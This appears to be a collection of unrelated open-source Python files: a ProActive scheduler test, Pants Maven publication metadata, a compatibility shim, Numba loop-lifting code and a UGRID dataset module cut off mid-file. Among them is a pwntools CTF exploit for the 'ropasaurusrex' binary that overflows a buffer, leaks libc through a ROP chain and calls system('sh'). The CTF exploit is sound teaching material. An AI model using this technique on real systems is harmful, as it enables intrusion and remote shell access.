# Parallel, Distributed, Multi-Core Computing for
# Enterprise Grids & Clouds
#
# Copyright (C) 1997-2011 INRIA/University of
# Nice-Sophia Antipolis/ActiveEon
# Contact: proactive@ow2.org or contact@activeeon.com
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Affero General Public License
# as published by the Free Software Foundation; version 3 of
# the License.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this library; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
# If needed, contact us to obtain a release under GPL Version 2 or 3
# or a different license than the AGPL.
#
# Initial developer(s): The ProActive Team
# http://proactive.inria.fr/team_members.htm
# Contributor(s):
#
#################################################################
# $$ACTIVEEON_INITIAL_DEV$$
#################################################################
import math
import time
import unittest
import os
import palinagent.daemon.main as main
import palinagent.daemon.eventgenerator as eventgenerator
from palinagent.daemon.errors import AgentError as AgentError
from palinagent.daemon.errors import AgentInternalError as AgentInternalError
from palinagent.daemon.eventgenerator import _ONE_WEEK_IN_SECS as _ONE_WEEK_IN_SECS
from palinagent.daemon.eventgenerator import StartEvent as StartEvent
from palinagent.daemon.eventgenerator import StopEvent as StopEvent
from palinagent.daemon.eventgenerator import Event as Event
from palinagent.daemon.eventgenerator import CalendarEventGenerator as CalendarEventGenerator
def almostEquals(value1, value2, sigma=2):
''' Some tests use current time so strict equality cannot be used '''
return math.fabs(value2 - value1) <= 2
class TestEvent(unittest.TestCase):
'''
Test the event class
It mostly checks that an exception is thrown when an invalid value is given
or an error is encountered
'''
def testInit(self):
''' Check that the Event ctor does not accept invalid values '''
# startOffset must be positive
e = Event(-1, 100, None, None)
self.assertRaises(AgentError, e.check)
# duration must be strictly positive
e = Event(0, 0, None, None)
self.assertRaises(AgentError, e.check)
# Too long duration
e = Event(0, _ONE_WEEK_IN_SECS, None, None)
self.assertRaises(AgentError, e.check)
def testStopOffset(self):
''' Check the stopOffset is correctly computed from startOffset and duration'''
event = Event(100, 200, None, None)
self.assertEqual(300, event.stopOffset)
def testToString(self):
''' Check to string '''
# Check it does not raise an exception
Event(100, 200, None, None).__str__()
class TestSpecificEvent(unittest.TestCase):
def test_epoch_date(self):
#print int(time.time())
#print time.asctime(time.localtime(time.time()))
event = Event(0, 10, None, None)
start_event = StartEvent(event, 0)
#print time.asctime(time.localtime(start_event.epoch_date))
stop_event = StopEvent(event, 0)
#print time.asctime(time.localtime(stop_event.epoch_date))
event = Event(_ONE_WEEK_IN_SECS - 20, 10, None, None)
start_event = StartEvent(event, 0)
#print time.asctime(time.localtime(start_event.epoch_date))
stop_event = StopEvent(event, 0)
#print time.asctime(time.localtime(stop_event.epoch_date))
class TestCalendarEventGenerator(unittest.TestCase):
'''
Test the calendar event generator
The generator is configured by hand, then we check that the generator
outputs the right events.
'''
def testCheckOverlapping(self):
''' Check that an exception is raised if two events overlaps '''
#Empty calendar
evg = CalendarEventGenerator()
evg.check_overlapping()
# Single event calendar
evg = CalendarEventGenerator()
evg.events = [Event(0, 100, None, None)]
evg.check_overlapping()
# No overlapping
evg = CalendarEventGenerator()
evg.events = [Event(0, 100, None, None), Event(200, 300, None, None), Event(500, 1000, None, None)]
evg.check_overlapping()
# No overlapping but sunday / monday overlap
evg = CalendarEventGenerator()
evg.events = [Event(200, 100, None, None), Event(_ONE_WEEK_IN_SECS - 100, 200, None, None)]
evg.check_overlapping()
# No overlapping but join
evg = CalendarEventGenerator()
evg.events = [Event(0, 100, None, None), Event(100, 300, None, None), Event(400, 1000, None, None)]
evg.check_overlapping()
# Basic overlapping
evg = CalendarEventGenerator()
evg.events = [Event(0, 100, None, None), Event(50, 100, None, None)]
self.assertRaises(AgentError, evg.check_overlapping)
# End of week overlapping
evg = CalendarEventGenerator()
evg.events = [Event(0, 100, None, None), Event(_ONE_WEEK_IN_SECS - 1, 100, None, None)]
self.assertRaises(AgentError, evg.check_overlapping)
def testNextEvent(self):
''' Test the event generator '''
class Action:
def getStart(self, config):
return lambda :self._start(config)
def _start(self, config):
return "START"
def getRestart(self, config):
return lambda :self._restart(config)
def _restart(self, config):
return "RESTART"
action = Action()
# No event
evg = CalendarEventGenerator(action)
g = evg.getActions()
self.assertRaises(AgentInternalError, g.next)
# One and only one event starting by start
bias = eventgenerator._seconds_elespased_since_start_of_week()
evg = CalendarEventGenerator(action)
evg.events = [Event(0+bias, 100, None, None)]
g = evg.getActions()
for i in range(1000):
(event) = g.next()
assert almostEquals(i * eventgenerator._ONE_WEEK_IN_SECS, event.seconds_remaining())
self.assertEqual(event.type, "START")
(event) = g.next()
assert almostEquals((i * eventgenerator._ONE_WEEK_IN_SECS) + 100, event.seconds_remaining())
self.assertEqual(event.type, "STOP")
# One and only one event starting by stop
bias = eventgenerator._seconds_elespased_since_start_of_week()
evg = CalendarEventGenerator(action)
evg.events = [Event(bias - 100, 200, None, None)]
g = evg.getActions()
(event) = g.next()
assert almostEquals(0, event.seconds_remaining())
self.assertEqual(event.type, "START")
for i in range(1000):
(event) = g.next()
assert almostEquals((i * eventgenerator._ONE_WEEK_IN_SECS) + 100, event.seconds_remaining())
self.assertEqual(event.type, "STOP")
(event) = g.next()
assert almostEquals((i+1) * eventgenerator._ONE_WEEK_IN_SECS - 100, event.seconds_remaining())
self.assertEqual(event.type, "START")
# First event is next week
bias = eventgenerator._seconds_elespased_since_start_of_week()
evg = CalendarEventGenerator(action)
evg.events = [Event(0, 10, None, None)]
g = evg.getActions()
for i in range(1000):
(event) = g.next()
assert almostEquals(eventgenerator._ONE_WEEK_IN_SECS - bias + (i*eventgenerator._ONE_WEEK_IN_SECS), event.seconds_remaining())
self.assertEqual(event.type, "START")
(event) = g.next()
assert almostEquals(eventgenerator._ONE_WEEK_IN_SECS - bias + (i*eventgenerator._ONE_WEEK_IN_SECS) + 10, event.seconds_remaining())
self.assertEqual(event.type, "STOP")
# Two simple events and only one event starting by stop
bias = eventgenerator._seconds_elespased_since_start_of_week()
evg = CalendarEventGenerator(action)
evg.events = [Event(bias + 100, 200, None, None), Event(bias + 1000, 400, None, None)]
g = evg.getActions()
for i in range(1000):
(event) = g.next()
assert almostEquals((i * eventgenerator._ONE_WEEK_IN_SECS) + 100, event.seconds_remaining())
self.assertEqual(event.type, "START")
(event) = g.next()
assert almostEquals(i * eventgenerator._ONE_WEEK_IN_SECS + 300, event.seconds_remaining())
self.assertEqual(event.type, "STOP")
(event) = g.next()
assert almostEquals(i * eventgenerator._ONE_WEEK_IN_SECS + 1000, event.seconds_remaining())
self.assertEqual(event.type, "START")
(event) = g.next()
assert almostEquals(i * eventgenerator._ONE_WEEK_IN_SECS + 1400, event.seconds_remaining())
self.assertEqual(event.type, "STOP")
# Next event is next week, with week overlapping and multi event
bias = eventgenerator._seconds_elespased_since_start_of_week()
evg = CalendarEventGenerator(action)
evg.events = [Event(bias - 500, 100, None, None), Event(bias - 300, 101, None, None), Event(bias - 100, eventgenerator._ONE_WEEK_IN_SECS-1000, None, None)]
g = evg.getActions()
for i in range(1000):
(event) = g.next()
assert almostEquals(eventgenerator._ONE_WEEK_IN_SECS - 1100 + (i*eventgenerator._ONE_WEEK_IN_SECS), event.seconds_remaining())
self.assertEqual(event.type, "STOP")
(event) = g.next()
assert almostEquals((i+1)*eventgenerator._ONE_WEEK_IN_SECS -500, event.seconds_remaining())
self.assertEqual(event.type, "START")
(event) = g.next()
assert almostEquals((i+1)*eventgenerator._ONE_WEEK_IN_SECS -400, event.seconds_remaining())
self.assertEqual(event.type, "STOP")
(event) = g.next()
assert almostEquals((i+1)*eventgenerator._ONE_WEEK_IN_SECS -300, event.seconds_remaining())
self.assertEqual(event.type, "START")
(event) = g.next()
assert almostEquals((i+1)*eventgenerator._ONE_WEEK_IN_SECS -199, event.seconds_remaining())
self.assertEqual(event.type, "STOP")
(event) = g.next()
assert almostEquals((i+1)*eventgenerator._ONE_WEEK_IN_SECS -100, event.seconds_remaining())
self.assertEqual(event.type, "START")
# Restart
bias = eventgenerator._seconds_elespased_since_start_of_week()
evg = CalendarEventGenerator(action)
evg.events = [Event(0+bias, 100, None, None), Event(100+bias, 100, None, None)]
g = evg.getActions()
for i in range(1000):
(event) = g.next()
assert almostEquals(i * eventgenerator._ONE_WEEK_IN_SECS, event.seconds_remaining())
self.assertEqual(event.type, "START")
(event) = g.next()
assert almostEquals(i * eventgenerator._ONE_WEEK_IN_SECS + 100, event.seconds_remaining())
self.assertEqual(event.type, "RESTART")
(event) = g.next()
assert almostEquals((i * eventgenerator._ONE_WEEK_IN_SECS) + 200, event.seconds_remaining())
self.assertEqual(event.type, "STOP")
class TestParser(unittest.TestCase):
'''
Check that the parser is able to get the data from the XML configuration file
'''
def testParseFile(self):
tree = main._parse_config_file(os.path.join(os.path.dirname(__file__), "./eventgeneratorTest_test_parse_file.xml"))
evg = eventgenerator.parse(tree, None)
# This event does not redefine the configuration
event = evg.events[0]
self.assertEqual("proactiveHome1", event.config.proactiveHome)
self.assertEqual("javaHome1", event.config.javaHome)
self.assertEqual(["param1"], event.config.jvmParameters)
# self.assertEqual(1, event.config.memoryLimit)
self.assertEqual(1, event.config.nbRuntimes)
self.assertEqual("script1", event.config.onRuntimeExitScript)
self.assertEqual((6000, 6002), event.config.portRange)
# This event redefines the whole configuration
event = evg.events[1]
self.assertEqual("proactiveHome2", event.config.proactiveHome)
self.assertEqual("javaHome2", event.config.javaHome)
self.assertEqual(["param2"], event.config.jvmParameters)
# self.assertEqual(2, event.config.memoryLimit)
self.assertEqual(2, event.config.nbRuntimes)
self.assertEqual("script2", event.config.onRuntimeExitScript)
self.assertEqual((6003, 6007), event.config.portRange)
# This event redefines only a part of the configuration
event = evg.events[2]
self.assertEqual("proactiveHome1", event.config.proactiveHome)
self.assertEqual("javaHome3", event.config.javaHome)
self.assertEqual(["param1"], event.config.jvmParameters)
# self.assertEqual(1, event.config.memoryLimit)
self.assertEqual(3, event.config.nbRuntimes)
self.assertEqual("script3", event.config.onRuntimeExitScript)
self.assertEqual((6000, 6002), event.config.portRange)
def testCoherentState(self):
tree = main._parse_config_file(os.path.join(os.path.dirname(__file__), "./eventgeneratorTest_test_parse_file.xml"))
evg = eventgenerator.parse(tree, None)
evg.check()
if __name__ == "__main__":
unittest.main()
|
sid-kap/pants
|
refs/heads/master
|
src/python/pants/backend/jvm/ossrh_publication_metadata.py
|
31
|
# coding=utf-8
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import six
from pants.backend.jvm.artifact import PublicationMetadata
from pants.base.validation import assert_list
def _validate_maybe_string(name, item):
if item and not isinstance(item, six.string_types):
raise ValueError('{} was expected to be of type {} but given {}'.format(name, type(item), item))
return item
def _validate_string(name, item):
if not item:
raise ValueError('{} is a required field'.format(name))
return _validate_maybe_string(name, item)
class Scm(object):
"""Corresponds to the maven POM <scm/> element.
Refer to the schema here: http://maven.apache.org/maven-v4_0_0.xsd
"""
@classmethod
def github(cls, user, repo):
"""Creates an `Scm` for a github repo.
:param string user: The github user or organization name the repo is hosted under.
:param string repo: The repository name.
:returns: An `Scm` representing the github repo.
"""
# For the url format, see: http://maven.apache.org/scm/git.html
params = dict(user=user, repo=repo)
connection = 'scm:git:git@github.com:{user}/{repo}.git'.format(**params)
url = 'https://github.com/{user}/{repo}'.format(**params)
return cls(connection=connection, developer_connection=connection, url=url)
def __init__(self, connection, developer_connection, url, tag=None):
"""See http://maven.apache.org/scm/scms-overview.html for valid connection formats for your scm.
:param string connection: The scm connection string for read-only access to the scm.
:param string developer_connection: The scm connection string for read-write access to the scm.
:param string url: An url pointing to a browseable web interface for the scm.
:param string tag: An optional tag corresponding to the published release. This will be
populated by pants during publish runs.
"""
self.connection = _validate_string('connection', connection)
self.developer_connection = _validate_string('developer_connection', developer_connection)
self.url = _validate_string('url', url)
self.tag = _validate_maybe_string('tag', tag)
def tagged(self, tag):
"""Creates a new `Scm` identical to this `Scm` but with the given `tag`."""
return Scm(self.connection, self.developer_connection, self.url, tag=tag)
class License(object):
"""Corresponds to the maven POM <license/> element.
Refer to the schema here: http://maven.apache.org/maven-v4_0_0.xsd
"""
def __init__(self, name, url, comments=None):
"""
:param string name: The full official name of the license.
:param string url: An url pointing to the license text.
:param string comments: Optional comments clarifying the license.
"""
self.name = _validate_string('name', name)
self.url = _validate_string('url', url)
self.comments = _validate_maybe_string('comments', comments)
class Developer(object):
"""Corresponds to the maven POM <developer/> element.
Refer to the schema here: http://maven.apache.org/maven-v4_0_0.xsd
"""
def __init__(self, user_id=None, name=None, email=None, url=None, organization=None,
organization_url=None, roles=None):
"""One of `user_id`, `name`, or `email` is required, all other parameters are optional.
:param string user_id: The user id of the developer; typically the one used to access the scm.
:param string name: The developer's full name.
:param string email: the developer's email address.
:param string url: An optional url pointing to more information about the developer.
:param string organization: An optional name for the organization the developer works on the
library for.
:param string organization_url: An optional url pointing to more information about the
developer's organization.
:param list roles: An optional list of role names that apply to this developer on this project.
"""
if not (user_id or name or email):
raise ValueError("At least one of 'user_id', 'name' or 'email' must be specified for each "
"developer.")
self.user_id = _validate_maybe_string('user_id', user_id)
self.name = _validate_maybe_string('name', name)
self.email = _validate_maybe_string('email', email)
self.url = _validate_maybe_string('url', url)
self.organization = _validate_maybe_string('organization', organization)
self.organization_url = _validate_maybe_string('organization_url', organization_url)
self.roles = assert_list(roles, key_arg='roles')
@property
def has_roles(self):
"""Returns `True` if this developer has one or more roles."""
# TODO(John Sirois): This is a layer leak - it only supports mustache rendering.
# Consider converting the OSSRHPublicationMetadata tree to a suitable form for mustache
# rendering where the rendering occurs (currently just in the JarPublish task).
return bool(self.roles)
class OSSRHPublicationMetadata(PublicationMetadata):
"""Corresponds to the Sonatype required fields for jars published to OSSRH.
See: http://central.sonatype.org/pages/requirements.html#sufficient-metadata
"""
def __init__(self, description, url, licenses, developers, scm, name=None):
"""All parameters are required except for `name` to pass OSSRH requirements.
:param string description: A description of the library.
:param string url: An url pointing to more information about the library.
:param list licenses: The licenses that apply to the library.
:param list developers: The developers who work on the library.
:param scm: The primary scm system hosting the library source code.
:param string name: The optional full name of the library. If not supplied an appropriate name
will be synthesized.
"""
def validate_nonempty_list(list_name, item, expected_type):
assert_list(item, expected_type=expected_type, can_be_none=False, key_arg='roles', allowable=(list,))
if not item:
raise ValueError('At least 1 entry is required in the {} list.'.format(list_name))
return item
self.description = _validate_string('description', description)
self.url = _validate_string('url', url)
self.licenses = validate_nonempty_list('licenses', licenses, License)
self.developers = validate_nonempty_list('developers', developers, Developer)
if not isinstance(scm, Scm):
raise ValueError("scm must be an instance of Scm")
self.scm = scm
self.name = _validate_maybe_string('name', name)
def _compute_fingerprint(self):
# TODO(John Sirois): Untangle a JvmTarget's default fingerprint from the `provides` payload
# fingerprint. Only the JarPublish task would be a consumer for this and today it rolls its
# own hash besides. For now just short-circuit the fingerprint, but after untangling, consider
# implementing a fingerprint consistent with the need to re-publish to maven central.
return None
|
gdub/python-archive
|
refs/heads/master
|
archive/compat.py
|
2
|
"""
A module for providing backwards compatibility for Python versions.
"""
import sys
IS_PY2 = sys.version_info[0] == 2
if IS_PY2:
def is_string(obj):
return isinstance(obj, basestring)
else:
def is_string(obj):
return isinstance(obj, str)
|
ssarangi/numba
|
refs/heads/master
|
numba/looplifting.py
|
6
|
from __future__ import print_function, division, absolute_import
from numba import utils
from numba.bytecode import ByteCodeInst, CustomByteCode
from collections import defaultdict
def lift_loop(bytecode, dispatcher_factory):
"""Lift the top-level loops.
Returns (outer, loops)
------------------------
* outer: ByteCode of a copy of the loop-less function.
* loops: a list of ByteCode of the loops.
"""
outer = []
loops = []
# Discover variables references
outer_rds, outer_wrs = find_varnames_uses(bytecode, iter(bytecode))
# Separate loops and outer
separate_loops(bytecode, outer, loops)
# Prepend arguments as negative bytecode offset
for a in bytecode.pysig.parameters:
outer_wrs[a] = [-1] + outer_wrs[a]
dispatchers = []
outerlabels = set(bytecode.labels)
outernames = list(bytecode.co_names)
for loop in loops:
args, rets = discover_args_and_returns(bytecode, loop, outer_rds,
outer_wrs)
disp = insert_loop_call(bytecode, loop, args,
outer, outerlabels, rets,
dispatcher_factory)
dispatchers.append(disp)
# Build outer bytecode
codetable = utils.SortedMap((i.offset, i) for i in outer)
outerbc = CustomByteCode(func=bytecode.func,
func_qualname=bytecode.func_qualname,
is_generator=bytecode.is_generator,
pysig=bytecode.pysig,
filename=bytecode.filename,
co_names=outernames,
co_varnames=bytecode.co_varnames,
co_consts=bytecode.co_consts,
co_freevars=bytecode.co_freevars,
table=codetable,
labels=outerlabels & set(codetable.keys()))
return outerbc, dispatchers
@utils.total_ordering
class SubOffset(object):
"""The loop-jitting may insert bytecode between two bytecode but we
cannot guarantee that there is enough integral space between two offsets.
This class workaround the problem by introducing a fractional part to the
offset.
"""
def __init__(self, val, sub=1):
assert sub > 0, "fractional part cannot be <= 0"
self.val = val
self.sub = sub
def next(self):
"""Helper method to get the next suboffset by incrementing the
fractional part only
"""
return SubOffset(self.val, self.sub + 1)
def __add__(self, other):
"""Adding to a suboffset will only increment the fractional part.
The integral part is immutable.
"""
return SubOffset(self.val, self.sub + other)
def __hash__(self):
return hash((self.val, self.sub))
def __lt__(self, other):
"""Can only compare to SubOffset or int
"""
if isinstance(other, SubOffset):
if self.val < other.val:
return self
elif self.val == other.val:
return self.sub < other.sub
else:
return False
elif isinstance(other, int):
return self.val < other
else:
return NotImplemented
def __eq__(self, other):
if isinstance(other, SubOffset):
return self.val == other.val and self.sub == other.sub
elif isinstance(other, int):
# Can never be equal to a integer by definition
return False
else:
return NotImplemented
def __repr__(self):
"""Print like a floating-point by it is not one at all.
"""
return "{0}.{1}".format(self.val, self.sub)
def insert_loop_call(bytecode, loop, args, outer, outerlabels, returns,
dispatcher_factory):
endloopoffset = loop[-1].next
# Accepted. Create a bytecode object for the loop
args = tuple(args)
lbc = make_loop_bytecode(bytecode, loop, args, returns)
# Generate dispatcher for this inner loop, and append it to the
# consts tuple.
disp = dispatcher_factory(lbc)
disp_idx = len(bytecode.co_consts)
bytecode.co_consts += (disp,)
# Insert jump to the end
insertpt = SubOffset(loop[0].next)
jmp = ByteCodeInst.get(loop[0].offset, 'JUMP_ABSOLUTE', insertpt)
jmp.lineno = loop[0].lineno
insert_instruction(outer, jmp)
outerlabels.add(outer[-1].next)
# Prepare arguments
loadfn = ByteCodeInst.get(insertpt, "LOAD_CONST", disp_idx)
loadfn.lineno = loop[0].lineno
insert_instruction(outer, loadfn)
insertpt = insertpt.next()
for arg in args:
loadarg = ByteCodeInst.get(insertpt, 'LOAD_FAST',
bytecode.co_varnames.index(arg))
loadarg.lineno = loop[0].lineno
insert_instruction(outer, loadarg)
insertpt = insertpt.next()
# Call function
assert len(args) < 256
call = ByteCodeInst.get(insertpt, "CALL_FUNCTION", len(args))
call.lineno = loop[0].lineno
insert_instruction(outer, call)
insertpt = insertpt.next()
if returns:
# Unpack arguments
unpackseq = ByteCodeInst.get(insertpt, "UNPACK_SEQUENCE",
len(returns))
unpackseq.lineno = loop[0].lineno
insert_instruction(outer, unpackseq)
insertpt = insertpt.next()
for out in returns:
# Store each variable
storefast = ByteCodeInst.get(insertpt, "STORE_FAST",
bytecode.co_varnames.index(out))
storefast.lineno = loop[0].lineno
insert_instruction(outer, storefast)
insertpt = insertpt.next()
else:
# No return value
poptop = ByteCodeInst.get(insertpt, "POP_TOP", None)
poptop.lineno = loop[0].lineno
insert_instruction(outer, poptop)
insertpt = insertpt.next()
jmpback = ByteCodeInst.get(insertpt, 'JUMP_ABSOLUTE',
endloopoffset)
jmpback.lineno = loop[0].lineno
insert_instruction(outer, jmpback)
return disp
def insert_instruction(insts, item):
i = find_previous_inst(insts, item.offset)
insts.insert(i, item)
def find_previous_inst(insts, offset):
for i, inst in enumerate(insts):
if inst.offset > offset:
return i
return len(insts)
def make_loop_bytecode(bytecode, loop, args, returns):
# Add return None
co_consts = tuple(bytecode.co_consts)
if None not in co_consts:
co_consts += (None,)
if returns:
for out in returns:
# Load output
loadfast = ByteCodeInst.get(loop[-1].next, "LOAD_FAST",
bytecode.co_varnames.index(out))
loadfast.lineno = loop[-1].lineno
loop.append(loadfast)
# Build tuple
buildtuple = ByteCodeInst.get(loop[-1].next, "BUILD_TUPLE",
len(returns))
buildtuple.lineno = loop[-1].lineno
loop.append(buildtuple)
else:
# Load None
load_none = ByteCodeInst.get(loop[-1].next, "LOAD_CONST",
co_consts.index(None))
load_none.lineno = loop[-1].lineno
loop.append(load_none)
# Return TOS
return_value = ByteCodeInst.get(loop[-1].next, "RETURN_VALUE", 0)
return_value.lineno = loop[-1].lineno
loop.append(return_value)
# Function name
loop_qualname = bytecode.func_qualname + ".__numba__loop%d__" % loop[0].offset
# Code table
codetable = utils.SortedMap((i.offset, i) for i in loop)
# Custom bytecode object
lbc = CustomByteCode(func=bytecode.func,
func_qualname=loop_qualname,
# Enforced in separate_loops()
is_generator=False,
pysig=bytecode.pysig,
arg_count=len(args),
arg_names=args,
filename=bytecode.filename,
co_names=bytecode.co_names,
co_varnames=bytecode.co_varnames,
co_consts=co_consts,
co_freevars=bytecode.co_freevars,
table=codetable,
labels=bytecode.labels)
return lbc
def stitch_instructions(outer, loop):
begin = loop[0].offset
i = find_previous_inst(outer, begin)
return outer[:i] + loop + outer[i:]
def remove_from_outer_use(inneruse, outeruse):
for name in inneruse:
inuse = inneruse[name]
outuse = outeruse[name]
outeruse[name] = sorted(list(set(outuse) - set(inuse)))
def discover_args_and_returns(bytecode, insts, outer_rds, outer_wrs):
"""
Basic analysis for args and returns
This completely ignores the ordering or the read-writes.
outer_rds and outer_wrs are modified
Note:
An invalid argument and return set will likely to cause a RuntimeWarning
in the dataflow analysis due to mismatch in stack offset.
"""
rdnames, wrnames = find_varnames_uses(bytecode, insts)
# Remove all local use from the set
remove_from_outer_use(rdnames, outer_rds)
remove_from_outer_use(wrnames, outer_wrs)
# Return every variables that are written inside the loop and read
# afterwards
rets = set()
for name, uselist in wrnames.items():
if name in outer_rds:
endofloop = insts[-1].offset
# Find the next read
for nextrd in outer_rds[name]:
if nextrd > endofloop:
break
else:
nextrd = None
# Find the next write
for nextwr in outer_wrs[name]:
if nextwr > endofloop:
break
else:
nextwr = None
# If there is a read but no write OR
# If the next use is a read, THEN
# it is a return value
if nextrd is not None and (nextwr is None or nextwr > nextrd):
rets.add(name)
# Make variables arguments if they are read before defined before the loop.
# Since we can't tell if things are conditionally defined here,
# We will have to be more conservative.
args = set()
firstline = insts[0].offset
for name in rdnames.keys():
outer_write = outer_wrs[name]
# If there exists a definition before the start of the loop
# for a variable read in side the loop.
if any(i < firstline for i in outer_write):
args.add(name)
# Make variables arguments if it is being returned but defined before the
# loop.
for name in rets:
if any(i < insts[0].offset for i in outer_wrs[name]):
args.add(name)
# Re-add the arguments back to outer_rds
for name in args:
outer_rds[name] = sorted(set(outer_rds[name]) | set([firstline]))
# Re-add the arguments back to outer_wrs
for name in rets:
outer_wrs[name] = sorted(set(outer_wrs[name]) | set([firstline]))
return args, rets
def find_varnames_uses(bytecode, insts):
rdnames = defaultdict(list)
wrnames = defaultdict(list)
for inst in insts:
if inst.opname == 'LOAD_FAST':
name = bytecode.co_varnames[inst.arg]
rdnames[name].append(inst.offset)
elif inst.opname == 'STORE_FAST':
name = bytecode.co_varnames[inst.arg]
wrnames[name].append(inst.offset)
return rdnames, wrnames
def separate_loops(bytecode, outer, loops):
"""
Separate top-level loops from the function
Stores loopless instructions from the original function into `outer`.
Stores list of loop instructions into `loops`.
Both `outer` and `loops` are list-like (`append(item)` defined).
"""
# XXX When an outer loop is rejected, there may be an inner loop
# which would still allow lifting.
endloop = None
cur = None
for inst in bytecode:
if endloop is None:
if inst.opname == 'SETUP_LOOP':
cur = [inst]
# Python may set the end of loop to the final jump destination
# when nested in a if-else. We need to scan the bytecode to
# find the actual end of loop
endloop = _scan_real_end_loop(bytecode, inst)
else:
outer.append(inst)
else:
cur.append(inst)
if inst.next == endloop:
for inst in cur:
if inst.opname in ['RETURN_VALUE', 'YIELD_VALUE',
'BREAK_LOOP']:
# Reject if return, yield or break inside loop
outer.extend(cur)
break
else:
loops.append(cur)
endloop = None
def _scan_real_end_loop(bytecode, setuploop_inst):
"""Find the end of loop.
Return the instruction offset.
"""
start = setuploop_inst.next
end = start + setuploop_inst.arg
offset = start
depth = 0
while offset < end:
inst = bytecode[offset]
depth += inst.block_effect
if depth < 0:
return inst.next
offset = inst.next
|
Gallopsled/pwntools-write-ups
|
refs/heads/master
|
2013/pctf/ropasaurus2/doit.py
|
3
|
#!/usr/bin/env python
from pwn import *
binary = './ropasaurusrex-85a84f36f81e11f720b1cf5ea0d1fb0d5a603c0d'
# Remote version
l = listen(0)
l.spawn_process([binary])
r = remote('localhost', l.lport)
# Uncomment for local version
# r = process(binary)
#
# If we run with a cyclic pattern, we end up with the following state:
#
# $ cyclic 999 > input
# $ gdb ./ropasaurusrex
# $ run < input
# ...
# EBP: 0x6261616a (b'jaab')
# ESP: 0xffffc7e0 ("laabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab\n\310\377\377\030\226\004\b\030\202\004\b")
# EIP: 0x6261616b (b'kaab')
#
# Let's generate a bit of padding to get us up to the edge of EIP control.
#
padding = cyclic(cyclic_find('kaab'))
#
# Load the library and libc from disk
#
rex = ELF(binary)
libc = ELF(next(path for path in rex.libs if 'libc' in path))
#
# Write out the address of a libc routine so that we can calculate
# the base address of libc, then re-run the vulnerable routine so
# we can exploit.
#
rop1 = ROP(rex)
rop1.write(1, rex.got['read'], 4)
rop1.call(0x80483F4)
stage1 = padding + str(rop1)
log.info("Stage 1 Rop:\n%s" % rop1.dump())
log.info("Stage 1 Payload:\n%s" % hexdump(stage1))
r.send(stage1)
libc_read = u32(r.recv(4))
log.info("%#x libc read" % libc_read)
#
# Stage 2 we do system('sh').
#
# While we can write 'sh' to lots of places, it's easy enough
# to just fine one in libc.
#
read_offset = libc.symbols['read'] - libc.address
libc.address = libc_read - read_offset
rop2 = ROP([rex,libc])
rop2.system(next(libc.search('sh\x00')))
stage2 = padding + str(rop2)
log.info("Stage 2 Rop:\n%s" % rop2.dump())
log.info("Stage 2 Payload:\n%s" % hexdump(stage2))
r.send(stage2)
#
# Can haz shell?
#
r.sendline('id')
log.success(r.recvrepeat().strip())
|
ayan-usgs/sci-wms
|
refs/heads/master
|
wms/models/datasets/ugrid.py
|
1
|
# -*- coding: utf-8 -*-
import os
import time
import bisect
import shutil
import tempfile
import itertools
from math import sqrt
from datetime import datetime
import pytz
from pyugrid import UGrid
from pyaxiom.netcdf import EnhancedDataset, EnhancedMFDataset
import numpy as np
import netCDF4
import pandas as pd
import matplotlib.tri as Tri
import rtree
from wms.models import Dataset, Layer, VirtualLayer, NetCDFDataset
from wms.utils import DotDict, calc_lon_lat_padding, calc_safety_factor, find_appropriate_time
from wms import data_handler
from wms import mpl_handler
from wms import gfi_handler
from wms import gmd_handler
from wms import logger
class UGridDataset(Dataset, NetCDFDataset):
@classmethod
def is_valid(cls, uri):
try:
with EnhancedDataset(uri) as ds:
return 'ugrid' in ds.Conventions.lower()
except RuntimeError:
try:
with EnhancedMFDataset(uri, aggdim='time') as ds:
return 'ugrid' in ds.Conventions.lower()
except (AttributeError, RuntimeError):
return False
except AttributeError:
return False
def has_cache(self):
return os.path.exists(self.topology_file)
def make_rtree(self):
p = rtree.index.Property()
p.overwrite = True
p.storage = rtree.index.RT_Disk
p.Dimension = 2
with self.dataset() as nc:
ug = UGrid.from_nc_dataset(nc=nc)
class FastRtree(rtree.Rtree):
def dumps(self, obj):
try:
import cPickle
return cPickle.dumps(obj, -1)
except ImportError:
super(FastRtree, self).dumps(obj)
def rtree_faces_generator_function():
for face_idx, node_list in enumerate(ug.faces):
nodes = ug.nodes[node_list]
xmin, ymin = np.min(nodes, 0)
xmax, ymax = np.max(nodes, 0)
yield (face_idx, (xmin, ymin, xmax, ymax), face_idx)
logger.info("Building Faces Rtree Topology Cache for {0}".format(self.name))
_, face_temp_file = tempfile.mkstemp(suffix='.face')
start = time.time()
FastRtree(face_temp_file,
rtree_faces_generator_function(),
properties=p,
overwrite=True,
interleaved=True)
logger.info("Built Faces Rtree Topology Cache in {0} seconds.".format(time.time() - start))
shutil.move('{}.dat'.format(face_temp_file), self.face_tree_data_file)
shutil.move('{}.idx'.format(face_temp_file), self.face_tree_index_file)
def rtree_nodes_generator_function():
for node_index, (x, y) in enumerate(ug.nodes):
yield (node_index, (x, y, x, y), node_index)
logger.info("Building Nodes Rtree Topology Cache for {0}".format(self.name))
_, node_temp_file = tempfile.mkstemp(suffix='.node')
start = time.time()
FastRtree(node_temp_file,
rtree_nodes_generator_function(),
properties=p,
overwrite=True,
interleaved=True)
logger.info("Built Nodes Rtree Topology Cache in {0} seconds.".format(time.time() - start))
shutil.move('{}.dat'.format(node_temp_file), self.node_tree_data_file)
shutil.move('{}.idx'.format(node_temp_file), self.node_tree_index_file)
def update_cache(self, force=False):
with self.dataset() as nc:
ug = UGrid.from_nc_dataset(nc=nc)
ug.save_as_netcdf(self.topology_file)
if not os.path.exists(self.topology_file):
logger.error("Failed to create topology_file cache for Dataset '{}'".format(self.dataset))
return
time_vars = nc.get_variables_by_attributes(standard_name='time')
time_dims = list(itertools.chain.from_iterable([time_var.dimensions for time_var in time_vars]))
unique_time_dims = list(set(time_dims))
with EnhancedDataset(self.topology_file, mode='a') as cached_nc:
